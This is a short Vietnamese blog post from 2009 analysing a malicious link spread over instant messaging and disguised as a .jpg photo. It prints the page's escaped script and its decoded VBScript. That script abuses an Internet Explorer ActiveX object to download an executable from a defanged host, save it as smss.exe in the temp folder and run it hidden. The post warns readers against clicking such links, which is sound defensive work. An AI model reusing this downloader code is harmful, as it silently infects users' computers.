Trao đổi với tôi

http://www.buidao.com

7/4/09

[Virus] Virus IM càng ngày càng tinh vi hơn

(Tác giả:Phạm Đức Hải)

Sáng nay tôi nhận được 1 link ảnh như sau :


hxxp://my.http.vn/hinhvn/miss_thuy.jpg


View source thấy đoạn code sau :



<GIF89a 8 f
>
<html>
<script>
if(frames)
{if(top.frames.length>0)
top.location.href=self.location;
}
</script>
<script
language=JavaScript>
document.write(unescape('%0D%0A%3C%........%2Fb%6Fdy%3E%0D%0A'))
</script>
</html>


thủ đoạn ở đây là đuôi file : .jpg --> ko ai nghi nghờ cả (Chỉ bị đối với
IE 5.x), cái này có vẻ giống Gaixinh.jpg



hơn nữa đoạn code đã được escape. Sau khi unescape nó sẽ như sau (đoạn được
escape):


<script language="VBScript">
on error resume next
dl =
"hxxp://my.http.vn/hinhvn/bt.exe"
Set df =
document.createElement("object")
df.setAttribute "classid",
"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x
=
df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set
S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl,
False
x.Send
fname1="smss.exe"
set F =
df.createobject("Scripting.FileSystemObject","")
set tmp =
F.GetSpecialFolder(2) ' Get tmp folder
fname1=
F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile
fname1,2
S.close
set Q =
df.createobject("Shell.Application","")
Q.ShellExecute
fname1,"","","open",0
</script>
<Center><h1><a
href="http://www.vuonmongmo.com">Next</a></Center>
<Center><img
src="hinh.jpg"></Center>
<br>
<Center><img
border="0" alt="Free Web Counter" src="http://xyz.freeweblogger.com/counter/index.php?u=hanthien&s=7seg"
ALIGN="middle" HSPACE="4" VSPACE="2"></Center>
<script
src=http://xyz.freeweblogger.com/counter/script.php?u=hanthien></script>



Code hoàn toàn giống các con virus cũ, file lây nhiễm
hxxp://my.http.vn/hinhvn/bt.exe chắc là cũng được viết bằng autoit (sẽ zem kỹ
sau-->sau khi xem thấy ko decomplie được, chưa biết thế nào).


Các bạn hãy cảnh giác ko bấm vào bất kỳ link nào send qua IM.